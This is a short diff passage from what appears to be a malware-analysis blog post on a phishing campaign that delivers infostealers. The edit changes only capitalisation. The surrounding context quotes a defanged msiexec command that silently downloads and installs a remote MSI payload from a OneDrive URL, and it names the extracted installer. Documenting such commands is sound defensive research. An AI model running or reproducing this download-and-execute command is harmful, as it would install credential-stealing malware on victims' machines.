MZHeader/MZHeader.github.io/_posts/2024-01-05-gone-phishing-for-infostealers.md

 C:\Windows\System32\msiexec.exe -package hxxPs[:/\]onedrive.live[.]com/download?cid=85B4181C5D4F7514&resid=58504D327740F380%21149&authkey=AIHrvoeE31NvUiI&.msi -qn
 ```

-Upon execution, msiexec would execute with the argument to download and execute a msi file from the OneDrive URL provided.
+Upon execution, MsiExec would execute with the argument to download and execute a MSI file from the OneDrive URL provided.

 This downloaded a file called "42WiseAnyConnect.msi", which we can extract a PowerShell script from using lessmsi: